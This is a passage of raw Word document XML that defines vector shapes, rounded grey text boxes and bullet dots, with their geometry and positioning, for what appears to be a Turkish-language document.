                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 742"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 720 w 742"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 741 w 742"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 741 w 742"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 723 w 742"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 720 w 742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9" o:spid="_x0000_s2139" style="width:37.1pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 221" o:spid="_x0000_s2140" style="position:absolute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YwHsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W8g9hALiWR7ENpnCghBErcYij5eYDF&#10;2tgm1spYqu2+fVUo9DjMzDfMdj/ZVgzU+8axhmSlQBCXzjRcabhd35avIHxANtg6Jg3f5GG/mz1t&#10;MTNu5DMNl1CJCGGfoYY6hC6T0pc1WfQr1xFH7+56iyHKvpKmxzHCbStTpV6kxYbjQo0dHWsqH5cv&#10;q+H0XrR+umFur7hOPj4fqhieldaL+XTYgAg0hf/wXzs3GtJkDb9n4hG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jAexQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,182;21,182;18,182;0,161;0,158;0,21;21,0;720,0;741,21;741,161;723,182;720,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 220" o:spid="_x0000_s2141" type="#_x0000_t202" style="position:absolute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5s88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ufH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5s88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&amp;#X003C;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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1824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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="217" name="Freeform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91 242"/>
                            <a:gd name="T3" fmla="*/ 291 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 291 242"/>
                            <a:gd name="T7" fmla="*/ 291 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 290 242"/>
                            <a:gd name="T11" fmla="*/ 290 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 270 242"/>
                            <a:gd name="T15" fmla="*/ 270 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 263 242"/>
                            <a:gd name="T19" fmla="*/ 263 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 242 242"/>
                            <a:gd name="T23" fmla="*/ 242 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 242 242"/>
                            <a:gd name="T27" fmla="*/ 242 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 266 242"/>
                            <a:gd name="T31" fmla="*/ 266 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 270 242"/>
                            <a:gd name="T35" fmla="*/ 270 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 291 242"/>
                            <a:gd name="T39" fmla="*/ 29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509D94" id="Freeform 218" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12.1pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,184785;13335,184785;11430,184150;0,171450;0,167005;13335,153670;17780,153670;31115,168910;31115,171450;17780,18478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1875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107315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="214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169"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="215" name="Freeform 217"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="169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351 169"/>
                              <a:gd name="T3" fmla="*/ 351 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 351 169"/>
                              <a:gd name="T7" fmla="*/ 351 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 351 169"/>
                              <a:gd name="T11" fmla="*/ 351 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 330 169"/>
                              <a:gd name="T15" fmla="*/ 330 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 327 169"/>
                              <a:gd name="T19" fmla="*/ 327 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 190 169"/>
                              <a:gd name="T23" fmla="*/ 190 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 169 169"/>
                              <a:gd name="T27" fmla="*/ 169 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 169 169"/>
                              <a:gd name="T31" fmla="*/ 169 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 190 169"/>
                              <a:gd name="T35" fmla="*/ 190 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 330 169"/>
                              <a:gd name="T39" fmla="*/ 330 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 351 169"/>
                              <a:gd name="T43" fmla="*/ 351 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 351 169"/>
                              <a:gd name="T47" fmla="*/ 35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9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5" o:spid="_x0000_s2142" style="position:absolute;margin-left:96.5pt;margin-top:8.45pt;width:41.35pt;height:9.15pt;z-index:-15497728;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,169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">
                <v:shape id="Freeform 217" o:spid="_x0000_s2143" style="position:absolute;left:1930;top:169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YPF8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W+g9hCLyWWbWhJHCumaTHNoZf8EHJc&#10;rI1tYq2Mpcbu20eFQo7DzHzD5MVkOnGlwbWWFSRRDIK4srrlWsFhX87mIJxH1thZJgW/5KBYPT7k&#10;mGk78pauO1+LAGGXoYLG+z6T0lUNGXSR7YmDd7aDQR/kUEs94BjgppNpHL9Jgy2HhQZ7+miouux+&#10;jILv9We9KI9f/iTTw+LlclqjrrZKPT9N70sQniZ/D/+3N1pBmrzC35lw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YPF8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,351;21,351;18,351;0,330;0,327;0,190;21,169;805,169;826,190;826,330;809,351;805,351" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 216" o:spid="_x0000_s2144" type="#_x0000_t202" style="position:absolute;left:1930;top:169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eboc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M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Hm6H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1926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369570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="213" name="Freeform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631 582"/>
                            <a:gd name="T3" fmla="*/ 631 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 631 582"/>
                            <a:gd name="T7" fmla="*/ 631 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 630 582"/>
                            <a:gd name="T11" fmla="*/ 630 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 610 582"/>
                            <a:gd name="T15" fmla="*/ 610 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 603 582"/>
                            <a:gd name="T19" fmla="*/ 603 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 582 582"/>
                            <a:gd name="T23" fmla="*/ 582 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 582 582"/>
                            <a:gd name="T27" fmla="*/ 582 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 607 582"/>
                            <a:gd name="T31" fmla="*/ 607 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 610 582"/>
                            <a:gd name="T35" fmla="*/ 610 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 631 582"/>
                            <a:gd name="T39" fmla="*/ 63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310B3" id="Freeform 214" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29.1pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,400685;13335,400685;11430,400050;0,387350;0,382905;13335,369570;17780,369570;31115,385445;31115,387350;17780,40068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1977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323215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="210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509"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="211" name="Freeform 213"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="509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692 509"/>
                              <a:gd name="T3" fmla="*/ 692 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 692 509"/>
                              <a:gd name="T7" fmla="*/ 692 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 691 509"/>
                              <a:gd name="T11" fmla="*/ 691 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 671 509"/>
                              <a:gd name="T15" fmla="*/ 671 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 667 509"/>
                              <a:gd name="T19" fmla="*/ 667 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 530 509"/>
                              <a:gd name="T23" fmla="*/ 530 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 509 509"/>
                              <a:gd name="T27" fmla="*/ 509 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 509 509"/>
                              <a:gd name="T31" fmla="*/ 509 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 530 509"/>
                              <a:gd name="T35" fmla="*/ 530 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 671 509"/>
                              <a:gd name="T39" fmla="*/ 671 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 691 509"/>
                              <a:gd name="T43" fmla="*/ 691 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 692 509"/>
                              <a:gd name="T47" fmla="*/ 69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2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09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1" o:spid="_x0000_s2145" style="position:absolute;margin-left:96.5pt;margin-top:25.45pt;width:45.6pt;height:9.15pt;z-index:-15496704;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,509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">
                <v:shape id="Freeform 213" o:spid="_x0000_s2146" style="position:absolute;left:1930;top:509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wnT8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74G+g9hCbolsH9LUiWxKaX4KhdKkD7BY&#10;G8vUWtmWkjhvXxUKOQ4z8w2zLkfbigsNvnGsIJ0nIIgrpxuuFXwfN7MlCB+QNbaOScGNPJTFw2SN&#10;uXZX/qLLIdQiQtjnqMCE0OVS+sqQRT93HXH0Tm6wGKIcaqkHvEa4bWWWJAtpseG4YLCjV0PVz+Fs&#10;FfTbz4Z495b1vXdPx+rDmPfnUanp4/iyAhFoDPfwf3uvFWRpCn9n4hG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CdPxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m890,183r-869,l18,182,,162r,-4l,21,21,,890,r22,21l912,162r-18,20l890,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,692;21,692;18,691;0,671;0,667;0,530;21,509;890,509;912,530;912,671;894,691;890,692" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 212" o:spid="_x0000_s2147" type="#_x0000_t202" style="position:absolute;left:1930;top:509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dos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8naLEAAAA3A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2028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593725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="209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983 935"/>
                            <a:gd name="T3" fmla="*/ 983 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 983 935"/>
                            <a:gd name="T7" fmla="*/ 983 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 983 935"/>
                            <a:gd name="T11" fmla="*/ 983 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 962 935"/>
                            <a:gd name="T15" fmla="*/ 962 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 956 935"/>
                            <a:gd name="T19" fmla="*/ 956 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 935 935"/>
                            <a:gd name="T23" fmla="*/ 935 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 935 935"/>
                            <a:gd name="T27" fmla="*/ 935 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 959 935"/>
                            <a:gd name="T31" fmla="*/ 959 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 962 935"/>
                            <a:gd name="T35" fmla="*/ 962 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 983 935"/>
                            <a:gd name="T39" fmla="*/ 983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83E688" id="Freeform 210" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:46.75pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,624205;13335,624205;11430,624205;0,610870;0,607060;13335,593725;17780,593725;31115,608965;31115,610870;17780,62420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2080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547370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="206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" cy="116205"/>
                          <a:chOff x="1930" y="862"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="207" name="Freeform 209"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="861"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2906 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 1044 862"/>
                              <a:gd name="T3" fmla="*/ 1044 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 1044 862"/>
                              <a:gd name="T7" fmla="*/ 1044 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 1043 862"/>
                              <a:gd name="T11" fmla="*/ 1043 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 1023 862"/>
                              <a:gd name="T15" fmla="*/ 1023 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 1020 862"/>
                              <a:gd name="T19" fmla="*/ 1020 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 883 862"/>
                              <a:gd name="T23" fmla="*/ 883 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 862 862"/>
                              <a:gd name="T27" fmla="*/ 862 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 862 862"/>
                              <a:gd name="T31" fmla="*/ 862 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 883 862"/>
                              <a:gd name="T35" fmla="*/ 883 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 1023 862"/>
                              <a:gd name="T39" fmla="*/ 1023 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 1043 862"/>
                              <a:gd name="T43" fmla="*/ 1043 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 1044 862"/>
                              <a:gd name="T47" fmla="*/ 104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7" h="183">
                                <a:moveTo>
                                  <a:pt x="97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21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="997" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="979" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="97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861"/>
                            <a:ext cx="99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&amp;#X000003C;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7" o:spid="_x0000_s2148" style="position:absolute;margin-left:96.5pt;margin-top:43.1pt;width:49.85pt;height:9.15pt;z-index:-15495680;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,862" coordsize="99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">
                <v:shape id="Freeform 209" o:spid="_x0000_s2149" style="position:absolute;left:1930;top:861;width:997;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="99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fWusQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/AEL7KmKuhajSKK4EEXVnfvz+bZ&#10;FpuX2qRa/70RhD0OM/MNM1s0phA3qlxuWUG/F4EgTqzOOVXwe9x8foFwHlljYZkUPMjBYt76mGGs&#10;7Z1/6HbwqQgQdjEqyLwvYyldkpFB17MlcfDOtjLog6xSqSu8B7gp5CCKRtJgzmEhw5JWGSWXQ20U&#10;7K8TuV4Xl2X3e3euXX36Ow11X6lOu1lOQXhq/H/43d5qBYNoDK8z4Qj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31rrEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m976,182r-955,l18,181,,161r,-3l,21,21,,976,r21,21l997,161r-18,20l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,1044;21,1044;18,1043;0,1023;0,1020;0,883;21,862;976,862;997,883;997,1023;979,1043;976,1044" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 208" o:spid="_x0000_s2150" type="#_x0000_t202" style="position:absolute;left:1930;top:861;width:99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08lcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/Y/hCd4WxM9iKtGkbGBIMhqPXh8a55t&#10;sHnpmqj1v18Owo4f3+/lenCtuFEfrGcNk0yBIK68sVxrOJZfb3MQISIbbD2ThgcFWK9eX5aYG3/n&#10;gm6HWIsUwiFHDU2MXS5lqBpyGDLfESfu7HuHMcG+lqbHewp3rZwqNZMOLaeGBjv6aKi6HK5Ow+bE&#10;xaf93f98F+fCluW74t3sovV4NGwWICIN8V/8dG+NhqlKa9OZdAT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NPJXBAAAA3A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&amp;#X000003C;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2131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809625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="205" name="Freeform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323 1275"/>
                            <a:gd name="T3" fmla="*/ 1323 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1323 1275"/>
                            <a:gd name="T7" fmla="*/ 1323 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1323 1275"/>
                            <a:gd name="T11" fmla="*/ 1323 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1302 1275"/>
                            <a:gd name="T15" fmla="*/ 1302 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1296 1275"/>
                            <a:gd name="T19" fmla="*/ 1296 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1275 1275"/>
                            <a:gd name="T23" fmla="*/ 1275 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1275 1275"/>
                            <a:gd name="T27" fmla="*/ 1275 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1299 1275"/>
                            <a:gd name="T31" fmla="*/ 1299 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1302 1275"/>
                            <a:gd name="T35" fmla="*/ 1302 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1323 1275"/>
                            <a:gd name="T39" fmla="*/ 1323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B2B28" id="Freeform 206" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:63.75pt;width:2.45pt;height:2.45pt;z-index:-1549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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,840105;13335,840105;11430,840105;0,826770;0,822960;13335,809625;17780,809625;31115,824865;31115,826770;17780,84010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2182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763270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="254635" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
